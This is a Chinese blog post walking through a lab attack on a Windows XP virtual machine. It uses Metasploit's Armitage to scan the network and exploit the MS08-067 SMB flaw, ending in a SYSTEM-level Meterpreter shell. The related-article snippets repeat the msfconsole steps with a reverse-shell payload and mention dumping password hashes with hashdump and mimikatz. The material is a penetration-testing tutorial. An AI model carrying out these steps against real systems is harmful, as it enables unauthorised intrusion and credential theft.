Metasploit攻击winXP实例

最新推荐文章于 2023-12-17 16:46:23 发布
最新推荐文章于 2023-12-17 16:46:23 发布
阅读量494 收藏 1
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51186260/article/details/117161993
版权
  1. ipconfig 查看网络配置信息
    在这里插入图片描述

2.关闭目标主机防火墙
在这里插入图片描述

3.攻击主机查看当前用户和ip地址
在这里插入图片描述

  1. service postgresql start 启动PostgreSQL服务
    service metasploit start 在另一个终端启动Metasploit服务
    armitage 启动Armitage
    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述

5.进入Armitage初始界面
在这里插入图片描述

  1. 扫描目标网段完整信息 在这里插入图片描述

7.扫描网段
在这里插入图片描述

8.扫描出主机
在这里插入图片描述

  1. 查看目标主机上开启的服务,选中目标主机10.1.1.130,右键选择Services。 在这里插入图片描述

  2. 定向扫描目标主机右键选择Scan,Armitage会调用Metasploit的漏洞扫描模块,对10.1.1.130进行漏洞扫描。在这里插入图片描述

  3. 寻找合适的攻击模块。选中10.1.1.130主机,依次选择菜单栏Attacks-Find Attacks,Armitage会开始自动搜索寻找合适的攻击模块。

在这里插入图片描述

  1. 完成对目标主机的攻击模块搜索以后,选中10.1.1.130主机右键可以发现多了Attack菜单。这里选择SMB漏洞对XP目标主机进行攻击,依次选择Attack》smb》ms08_067_netapi菜单。
    在这里插入图片描述

  2. 漏洞攻击xp
    在弹出的攻击配置对话框中Targets处配置目标主机的系统,10.1.1.130主机是简体中文版xp系统,故选择41=>Windows XP SP3 Chinese-Simplified{NX)在这里插入图片描述

  3. 攻击完成后,目标主机的图标会发生明显变化,Armitage会自动建立一个驻留在内存的shellcode 也就是Meterpreter,右键打开Meterpreter shell,输入getuid命令查看当前用户的权限是SYSTEM权限,攻击完成。
    在这里插入图片描述

15攻击完成

在这里插入图片描述

_GUOGUO
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Kali Linux渗透基础知识整理(三):漏洞利用
blotemj.blog.csdn.net
08-08 588
Kali Linux渗透基础知识整理系列文章回顾 漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透。网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的。顾名思义,利用漏洞,达到攻击的目的。 Metasploit Framework rdesktop + hydra Sqlmap Arpspoof tcpdump + ferret + hamster Ettercap SET Metas...
认识二进制安全与漏洞攻防技术 (Windows平台)
墨鱼菜鸡
01-14 390
二进制漏洞是指程序存在安全缺陷,导致攻击者恶意构造的数据(如Shellcode)进入程序相关处理代码时,改变程序原定的执行流程,从而实现破坏或获取超出原有的权限。 0Day漏洞 在计算机领域中,0day漏洞通常是指还没有补丁的漏洞,或是已经被少数人发现的,但还没被传播开来,官方还未修复的漏洞,也称为“零日漏洞”或“零时差漏洞”,主要强调即时性。由0day衍生出1day的概念,就是指刚被公开或...
metasploit 利用MS08-067渗透攻击xp系统全过程
weixin_30889885的博客
07-03 781
工具:metasploit,目标系统 windows xp sp3 English 渗透攻击过程1.search MS08-0672. use exploit/windows/smb/ms08_067_netapi3. show payloads4. set payload generic/shell_reverse_tcp5. show targets6. show...
Metasploit-Framework利用ms08_067 漏洞渗透Windows XP SP3(Windows 10 主机)
Zoran_db
01-21 1587
前期准备 a)攻击主机:为Window10系统(本机) 在Metasploit官方网站下载Windows版本的Metasploit-framework(而不是pro版本),之后安装。在命令行输入 msfconsole 运行Metasploit。 b)目标主机:在网上搜索,安装了WindowsXP虚拟机,在Vmware中装载运行 安装完成后要对WindowsXP虚拟机做如下设置,否则会导致在exploit时显示连接超时或者拒绝连接。关闭防火墙,自动更新即可。 开始渗透测试 查找漏洞 输入命令:searc
使用MetasploitWindowsXP渗透测试
panfengblog
11-17 1399
使用MetasploitWindowsXP渗透测试 哇,见识到了,渗透好猛 _ (大佬勿喷,我是菜鸡QAQ) 1. 破解用户口令 在我们使用漏洞渗透拿到windows的系统权限(system权限)时,就可以使用用hashdump或者scraper脚本获取用户口令hash辣~~ 可以通过hash碰撞的方式获得口令明文,或者直接使用mimikatz获得口令明文(当然是选择mimikatz更快鸭!) 2. 权限提升 参考博客:点我:-) 我们需要先拿到一个权限受限的shell鸭(比如使用ms10-0
kali 攻击 Win XP
最新发布
感谢关注
12-17 527
1.启动kali,切换到。(2)检查是否连上,显示。6.设置目标,根据自己。
Metasploit攻击xpwindows/smb/ms08_067_netapi
Shiliang1995
10-23 1909
第一步 安装XP虚拟机 这里用的系统版本如下 然后用nmap扫描XP系统的ip地址发现,扫不出来445端口,也就不用metasploit进行攻击 所以先对XP设置一下 编辑注册表HKEY_LOCAL_MACHINE=>SYSTEM=>CurrentControlSet=>Services=>NetBT=>Parameters 在Parameters上右键...
metasploit模拟攻击
03-17
### Metasploit模拟攻击知识点详解 #### 一、Metasploit简介与应用场景 **Metasploit**是一款开源的安全漏洞检测工具,它可以帮助安全专家验证漏洞的存在,并管理这些漏洞的利用方式。Metasploit广泛应用于渗透...
一些不错的网页
墨鱼菜鸡
12-06 2365
http://www.zhengdazhi.com/archives/1749 书签栏 信息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL ...
提权—Win溢出提权用户检测利用
qi_SJQ_的博客
01-30 1163
1.权限提升环境问题:WEB与本地提权 web:我们借助web的网站权限webshell进而获取服务器操作系统的用户权限此为web提权。 本地:windows上有许多用户:普通用户,system用户,administrator用户等,我们将普通用户提升到高权限用户称为本地提权。 两者比较显然web提权更繁琐难度更大。windows系统版本一般也以winserver08/12居多,winxp/7/10很少用来搭服务器。 windows各种用户权限: 常见windows命令也要记住: 3. 我们.
演示使用Metasploit入侵Windows
qq284489030的博客
05-09 2682
我使用KaliLinux的IP地址是192.168.0.112;在同一局域网内有一台运行WindowsXP(192.168.0.108)的测试电脑。   本文演示怎么使用Metasploit入侵windows xp sp3。   启动msfconsole:   # msfconsole   选择一个漏洞:   msf > search platform: windows...
Metasploit攻击winXP
2301_77778745的博客
04-25 118
Attack——smb——【所攻击的漏洞】在另一个终端启动Metasploit服务。启动PostgreSQL服务。启动Armitage。
黑客公布XP攻击代码能关闭自带防火墙
shiTou工作室..
11-07 1127
黑客公布了一个代码。攻击者利用这个代码能够关闭某些Windows XP计算机的Windows防火墙。 这个代码是在星期日(10月29日)上午在互联网上公布的。利用这个代码,攻击者能够关闭运行Windows互联网连接服务(ICS)的全面使用补丁的Windows XP计算机的Windows防火墙。互联网连接服务能够让用户把自己的计算机变成一台路由器,与局域网上的其它计算机共享互联网连接。这个服务一般是
metasploit xp_sp3中文版系统rop修改
红领巾 的专栏
06-30 1097
之前用metasploit IE8进行试验的时,老发现不行
使用MSF 利用 ms08_067 对 XP 进行渗透
枫梓林のBlog
04-21 2253
利用 ms08_067 对 XP 进行渗透 文章目录利用 ms08_067 对 XP 进行渗透一、项目要求二、项目实施1. 实施目标2. 实施方案2.1 扫描该网段存活的主机2.2 使用nmap 判断目标主机IP地址2.3 使用 nessus 扫描该系统漏洞2.4 使用 MetasploitXP 进行渗透三、总结 一、项目要求 渗透到 XP系统系统中执行几条命令 二、项目实施 1. 实施目标 使用工具寻找目标内存活的主机 使用工具,判断其操作系统,及相关信息收集 扫描该系统的漏洞,进行复
kali:Nessus扫描漏洞并用msf利用攻击xp系统
qq_45747414的博客
11-23 5710
Nessus扫描漏洞 1.启动nessus服务 /bin/systemctl start nessusd.service 2.在浏览器打开https://192.168.50.128:8834/,登陆 3.进入开始扫描 在启动nessus过程中遇到的问题: NOTICE: Nessus has detected that API access on this scanner is disabled. 这里尝试了使用指令/opt/nessus/sbin/nessuscli update --all ##
Metasploit 攻击winXP
Epsilon
01-06 8920
本次实验会用到以下资源: Kali linux 镜像 windows XP SP2 镜像 进入kali linux进行渗透: # msfconsole msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST TARGETIP msf exploit(ms08_
Kali渗透测试——利用metasploit攻击靶机WinXP SP1
dif90304的博客
05-19 1006
搭建渗透测试环境 Kali攻击WinXP SP1 靶机 启动metasploitwindows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配置WinXP SP1靶机的IP地址 执行漏洞利用 后漏洞利用:meterpreter> ...
Metasploit网络渗透攻击技术解析
通过Armitage,用户可以更方便地管理多个Metasploit会话,执行复杂的攻击策略,以及进行多主机的渗透测试。 网络渗透攻击是一种高级的、系统性的攻击方式,区别于传统的单一漏洞利用。攻击者通常会采用多种技术和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_GUOGUO

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值